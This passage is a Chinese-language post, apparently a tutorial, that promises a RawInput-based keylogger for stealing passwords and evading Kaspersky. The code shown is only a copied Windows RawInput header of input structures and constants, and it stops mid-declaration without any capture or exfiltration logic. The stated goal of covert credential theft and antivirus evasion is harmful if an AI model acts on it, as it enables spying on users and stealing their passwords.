在国家之间的网络战争中,窃取密码是个很重要的事情。
而密码往往是键盘输入的。利用原始设备输入变化RawInput 实现键盘记录,并穿透最牛的杀毒软件卡巴斯基。
引用外国人的原始设备输入变化的类。请柬代码与详细注解。
#ifndef _RAWINPUT_H
#define _RAWINPUT_H
#include <windows.h>
/*
* The input is in the regular message flow,
* the app is required to call DefWindowProc
* so that the system can perform clean ups.
*/
#define RIM_INPUT 0
/*
* The input is sink only. The app is expected
* to behave nicely.
*/
#define RIM_INPUTSINK 1
/*
* Raw Input data header
*/
typedef struct tagRAWINPUTHEADER {
DWORD dwType;
DWORD dwSize;
HANDLE hDevice;
WPARAM wParam;
} RAWINPUTHEADER, *PRAWINPUTHEADER, *LPRAWINPUTHEADER;
/*
* Type of the raw input
*/
#define RIM_TYPEMOUSE 0
#define RIM_TYPEKEYBOARD 1
#define RIM_TYPEHID 2
/*
* Raw format of the mouse input
*/
typedef struct tagRAWMOUSE {
/*
* Indicator flags.
*/
USHORT usFlags;
/*
* The transition state of the mouse buttons.
*/
union {
ULONG ulButtons;
struct {
USHORT usButtonFlags;
USHORT usButtonData;
};
};
/*
* The raw state of the mouse buttons.
*/
ULONG ulRawButtons;
/*
* The signed relative or absolute motion in the X direction.
*/
LONG lLastX;
/*
* The signed relative or absolute motion in the Y direction.
*/
LONG lLastY;
/*
* Device-specific additional information for the event.
*/
ULONG ulExtraInformation;
} RAWMOUSE, *PRAWMOUSE, *LPRAWMOUSE;
/*
* Define the mouse button state indicators.
*/
#define RI_MOUSE_LEFT_BUTTON_DOWN 0x0001 // Left Button changed to down.
#define RI_MOUSE_LEFT_BUTTON_UP 0x0002 // Left Button changed to up.
#define RI_MOUSE_RIGHT_BUTTON_DOWN 0x0004 // Right Button changed to down.
#define RI_MOUSE_RIGHT_BUTTON_UP 0x0008 // Right Button changed to up.
#define RI_MOUSE_MIDDLE_BUTTON_DOWN 0x0010 // Middle Button changed to down.
#define RI_MOUSE_MIDDLE_BUTTON_UP 0x0020 // Middle Button changed to up.
#define RI_MOUSE_BUTTON_1_DOWN RI_MOUSE_LEFT_BUTTON_DOWN
#define RI_MOUSE_BUTTON_1_UP RI_MOUSE_LEFT_BUTTON_UP
#define RI_MOUSE_BUTTON_2_DOWN RI_MOUSE_RIGHT_BUTTON_DOWN
#define RI_MOUSE_BUTTON_2_UP RI_MOUSE_RIGHT_BUTTON_UP
#define RI_MOUSE_BUTTON_3_DOWN RI_MOUSE_MIDDLE_BUTTON_DOWN
#define RI_MOUSE_BUTTON_3_UP RI_MOUSE_MIDDLE_BUTTON_UP
#define RI_MOUSE_BUTTON_4_DOWN 0x0040
#define RI_MOUSE_BUTTON_4_UP 0x0080
#define RI_MOUSE_BUTTON_5_DOWN 0x0100
#define RI_MOUSE_BUTTON_5_UP 0x0200
/*
* If usButtonFlags has RI_MOUSE_WHEEL, the wheel delta is stored in usButtonData.
* Take it as a signed value.
*/
#define RI_MOUSE_WHEEL 0x0400
/*
* Define the mouse indicator flags.
*/
#define MOUSE_MOVE_RELATIVE 0
#define MOUSE_MOVE_ABSOLUTE 1
#define MOUSE_VIRTUAL_DESKTOP 0x02 // the coordinates are mapped to the virtual desktop
#define MOUSE_ATTRIBUTES_CHANGED 0x04 // requery for mouse attributes
/*
* Raw format of the keyboard input
*/
typedef struct tagRAWKEYBOARD {
/*
* The "make" scan code (key depression).
*/
USHORT MakeCode;
/*
* The flags field indicates a "break" (key release) and other
* miscellaneous scan code information defined in ntddkbd.h.
*/
USHORT Flags;
USHORT Reserved;
/*
* Windows message compatible information
*/
USHORT VKey;
UINT Message;
/*
* Device-specific additional information for the event.
*/
ULONG ExtraInformation;
} RAWKEYBOARD, *PRAWKEYBOARD, *LPRAWKEYBOARD;
/*
* Define the keyboard overrun MakeCode.
*/
#define KEYBOARD_OVERRUN_MAKE_CODE 0xFF
/*
* Define the keyboard input data Flags.
*/
#define RI_KEY_MAKE 0
#define RI_KEY_BREAK 1
#define RI_KEY_E0 2
#define RI_KEY_E1 4
#define RI_KEY_TERMSRV_SET_LED 8
#define RI_KEY_TERMSRV_SHADOW 0x10
/*
* Raw format of the input from Human Input Devices
*/
typedef struct tagRAWHID {
DWORD dwSizeHid; // byte size of each report
DWORD dwCount; // number of input packed
BYTE bRawData[1];
} RAWHID, *PRAWHID, *LPRAWHID;
/*
* RAWINPUT data structure.
*/
typedef struct tagRAWINPUT {
RAWINPUTHEADER header;
union {
RAWMOUSE mouse;
RAWKEYBOARD keyboard;
RAWHID hid;
} data;
} RAWINPUT, *PRAWINPUT, *LPRAWINPUT;
/*
* Flags for GetRawInputData
*/
#define RID_INPUT 0x10000003
#define RID_HEADER 0x10000005
typedef struct HRAWINPUT__ * HRAWINPUT;
typedef
UINT
(_stdcall * PGetRawInputData)(
HRAWINPUT hRawInput,
UINT uiCommand,
LPVOID pData,
PUINT pcbSize,
UINT cbSizeHeader
);
/*
* Raw Input Device Information
*/
#define RIDI_PREPARSEDDATA 0x20000005
#define RIDI_DEVICENAME 0x20000007 // the return valus is the character length, not the byte size
#define RIDI_DEVICEINFO 0x2000000b
typedef struct tagRID_DEVICE_INFO_MOUSE {
DWORD dwId;
DWORD dwNumberOfButtons;
DWORD dwSampleRate;
} RID_DEVICE_INFO_MOUSE, *PRID_DEVICE_INFO_MOUSE;
typedef struct tagRID